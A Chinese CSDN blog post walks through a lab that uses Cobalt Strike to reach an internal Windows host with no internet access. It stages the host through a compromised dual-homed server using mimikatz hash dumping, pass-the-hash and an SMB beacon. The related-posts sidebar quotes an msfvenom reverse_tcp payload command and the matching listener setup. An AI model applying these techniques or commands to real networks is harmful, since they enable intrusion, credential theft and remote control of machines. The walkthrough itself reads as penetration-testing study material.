cs利用smb拿不出网windows的权限

已于 2024-05-22 15:25:22 修改
阅读量360 收藏 3
点赞数 5
分类专栏: 网安 文章标签: 安全
于 2024-05-22 11:49:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vt_yjx/article/details/139093117
版权

目录

实验准备

1.上线winserver

2.上线windows

2.1抓hash

2.2扫内网结构

2.3哈希横向

总结

实验准备

kali-------winserver2012------windows

外网            边界服务器                内网主机

ip:

kali:192.168.247.137

winserver:192.168.247.133;192.168.47.120

windows:192.168.47.130

目的:windows不出网,要拿到windwos的权限

1.上线winserver

        先用cs上线winserver,因为跟攻击机有在同一个网段的网卡,所以直接用cs上线:

        生成监听器-生成木马放到python的http.server上--winserver下载下来执行上线

        

2.上线windows

2.1抓hash

        因为windows跟攻击机不在一个网段,没法直接上线,需要靠winserver搭建个smb隧道,但是前提连接内网的机子需要权限,也就是密码,所以猜winserver的密码可以用,就先抓winserver的administrator的hash。

直接在cs上运行mimikatz:

2.2扫内网结构

然后用portscan扫出内网结构:可以看到47.130这台机子已经扫出来了

2.3哈希横向

然后就在这台机子上用hash登录上去:

监听器就选之前创建的smb,会话选winserver2012(这里ip变了是因为网络出问题重搭了一遍,不影响)

可以看到通过192.168.247.129连上了192.168.247.130了

通信过程就是cs执行的命令发给winserver,winserver发给windows,然后windows回给winserver。最后winserver会给cs。

横向上去的权限为system

总结

总体思路就是通过winserver这台机器当做中间代理,连通攻击机和内网中不出网的机器。如果还有三层内网的话可以用同样的思路,前提是账号密码一样(这里为了实验假设一样,真实环境说不定)。

vt_yjx
关注
专栏目录
渗透-cs上线之提权测试方法
lza20001103的博客
05-08 5234
cs上线之提权方法
CS学习笔记】7、SMBbean的作用
TeamsSix 的 CSDN 空间
05-29 601
0x00 SMB Beacon 简介 SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信对同一台主机上的 Beacon 和跨络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。 因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效(系统防火墙默认是允许445的端口与外界通信的,其他端口可能会弹窗提醒,会导致远程命令行反弹s
cs利用smb上线内不出主机
来到了学渣的博客
10-21 2933
实战中打入内经常会碰到内中存在不出的主机。 实验 win7通外也和域内不出主机相通,域内不出主机ip10.0.0.3 前提该出主机已经被成功拿下。 利用这个机子作为中间人,创建一个listen,Name这里我设置为smb1。 选择 Attacks->Packages->Windows Executable(Stageless),生成exe、dll木马文件都可以 生成的beacon.exe木马文件。并将该木马文件上传至目标主机,这里我同时上传了PsExec.exe工具进行一
CS_Smb_Beacon上线不出机器
huohaowen的博客
02-22 794
来讲一下上线不出的机器的cs自带的办法
不出上线CS的各种姿势(内横向)
qq_64395221的博客
06-21 1689
在内环境中可以使用ipc $生成的SMB Beacon上传到目标主机执行,但是目标主机并不会直接上线的,需要我们自己用链接命令(link <ip>)去连接它。经常是拿下一台边缘机器,其有多块卡,用于连接内外,内机器都不出。因为连接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。一样,建立pystinger连接之后,直接生成payload在业务主机执行,业务内主机192.168.111.236即可成功上线。
windows提权的几种姿势
weixin_44300286的博客
09-07 4381
一、工具提权 1、msf提权 准备阶段: 用msfvenom生成一个马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe 然后用msf开启一个监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 expl
巧用smb拿下不出主机
渗透测试研究中心
01-24 447
0x00 前言之前在打一个域环境的时候出现了域内主机不出的情况,当时用的是cs的socks代理将不出主机的流量代理到了边缘主机上。当时没有考虑太多,下来之后想到搭一个环境复现一下当时的情况,看有没有更简便的方法能够打下不出的主机。机缘巧合之下,发现了这个域环境还不错,再复现的过程中也有一些知识触及了我的知识盲区,也收获了许多新的知识。特地把过程记录下来,与想要学习打域内不出主机的师傅们共...
不出主机上线到CobaltStrike的方式
内心不种满鲜花就会长满杂草
05-26 4022
当我们获取了一台边界服务器的权限,其一些内中的主机访问不了外时,我们如何让其上线到cs?如下,win2012-1为边界服务器,其有一个内段192.168.10.x,同此段的还有两台服务器win7-1和win2012-2,但是这两台服务器访问不了外。假设我们能通过某种方式拿到他们的权限,但是我们又想把他们上线到cs,该怎么办了?
渗透--对不出目标的打法
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
08-03 1681
配置络 在VM虚拟机中按照下边的络拓扑进行配置络。络拓扑图如下: win7具有双卡,其中外ip是192.168.8.133,内段是52。三台机器彼此互通,但是win server 2008和win2003不通外。用我mac作为攻击机,来对这个靶场环境进行渗透测试。 外打点 在win7这台靶机上,使用PHPStudy让站可以运行起来。在攻击机上,访问http://192.168.8.133可以看到是一个phpStudy 探针。对这站进行渗透,因为本文主要写在内渗透过程..
【远控使用】Cobalt Strike横向渗透域控
孤桜懶契
09-11 2383
categories: 知识积累 top: FALSE copyright: true abbrlink: 1643719980 #date: '2021-8-7 12:00:00' #description:1400x780 tags: 内渗透 提权 渗透测试 黑客工具photos: https://gitee.com/gylq/cloudimages/raw/master/img/image-20210826182104275.png 前言 Cobalt Strike.
渗透-Windows渗透
lza20001103的博客
08-15 1996
渗透-Windows渗透 文章目录内渗透-Windows渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.
渗透测试-络攻防面试题(非常全面,根据自己经验所写,长期更新)
weixin_46626737的博客
01-03 1422
10)mssql,orcale的一些特定函数和闭合方法---------------------------------------------------------------no------------------------------------------------------1)脏牛内核提权----------------------------------------------no----------------------------------------------
cs客户端 实时权限_「CS学习笔记」7、SMBbean的作用
weixin_39777540的博客
12-09 116
0x00 SMB Beacon 简介SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信对同一台主机上的 Beacon 和跨络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时...
ICT络赛道安全考点知识总结4
m0_72765822的博客
11-04 753
RADIUS和HWTACACS协议通常都使用共享密钥对传输的用户信息进行加密,以确保安全传输。 用来封装EAP报文的RADIUS属性通常是"EAP-Message",它用于传输EAP认证过程中的消息。 LDAP的域名属性通常是"DC"(Domain Component),用于表示域名的组成部分。 BFD(Bidirectional Forwarding Detection)可以用于检测络设备之间直连物理链路的双向转发路径的故障,但也可以用于检测其他类型的链路故障。 管理员为虚拟系统手工分配资源时,
Neo4j数据库清理指南:如何安全地删除所有节点和索引
engchina的专栏
11-05 531
Neo4j数据库清理指南:如何安全地删除所有节点和索引
微软日志丢失事件敲响安全警钟
juminfo的博客
11-08 297
据报告,从9月2日至9月19日,持续长达两周的时间里,微软的多项核心云服务,包括身份验证平台Microsoft Entra、安全信息与事件管理(SIEM)平台Sentinel、云安全解决方案Defender for Cloud以及数据目录服务Purview,都经历了安全日志记录的空白期。系统可以实时、不间断地收集并整合各类设备的日志信息,通过先进的关联分析技术和机器学习手段,助力用户从庞杂的日志数据中快速识别异常安全事件,全面满足合规审计、分析调查及数据留存等多日志场景使用需求。
信息安全工程师(82)操作系统安全概述
m0_73399576的博客
11-08 826
信息安全工程师——操作系统安全概述篇
shodan 【2】(泷羽sec)
最新发布
m0_68984471的博客
11-08 656
shodan的使用方法
国标GB28181页直播平台EasyGBS国标GB28181软件的应急管理与安全生产解决方案
EasyGBS的博客
11-04 847
EasyGBS作为国标GB28181协议的视频融合管理平台,能够实现全天候、稳定的安防监控,加强事件预防、应急处理和事后追责,缩短信息传递时间,构建覆盖市、县的纵向络,并与相关单位联通。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值